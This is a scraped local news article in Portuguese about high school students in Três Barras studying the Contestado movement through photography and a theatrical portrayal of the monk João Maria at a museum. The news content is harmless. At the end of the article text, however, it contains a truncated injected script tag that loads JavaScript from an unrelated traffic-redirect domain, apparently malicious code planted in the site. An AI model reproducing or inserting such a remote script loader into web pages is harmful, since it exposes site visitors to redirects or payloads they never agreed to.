InícioCuriosidades do PassadoAlunos do Ensino Médio tem aulas com fotografias e teatro no Museu...

Alunos do Ensino Médio tem aulas com fotografias e teatro no Museu Histórico de Três Barras

Últimas notícias

Penso, logo destino: Cerca de 886 pneus em desuso são recolhidos em Três Barras

O município de Três Barras realizou nesta quarta-feira, 24,...

Vítima de acidente para encima do teto do carro após colisão

Na tarde desta quarta-feira, 25, por volta das 16h30, ...

Quem diz que História é disciplina monótona, só do passado? Professores trabalham o Movimento do Contestado de forma dinâmica e prazerosa. O projeto “Contestado em Imagens” está sendo desenvolvido, de forma interdisciplinar, com alunos do Ensino Médio na E.E.B. “Colombo Machado Salles” (Três Barras) e E.E.B. “Irmã Maria Felicitas” (Canoinhas).

Os professores Everton (História) e Luciane (Geografia) acompanharam os alunos, no dia 25 de junho, durante a sessão de fotos, no Museu do Patrimônio Histórico de Três Barras.

 

 

Durante a sessão de fotos, Agostinho Kryszyszyn fez uma bela encenação do monge João Maria. No vídeo a seguir é possível ver partes da apresentação.

 

 

O monge João Maria faz parte da cultura regional. Ele é encenado por Agostinho e empolga o público que o prestigia.  Além do preparo das encenações, ele nos fala de sua habilidade com a pintura em tela.

 

Retornando a escola, os alunos deverão realizar atividades, envolvendo outras disciplinas, que integram o projeto. O resultado final será apresentado, na Semana do Contestado, no mês de outubro de 2018…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.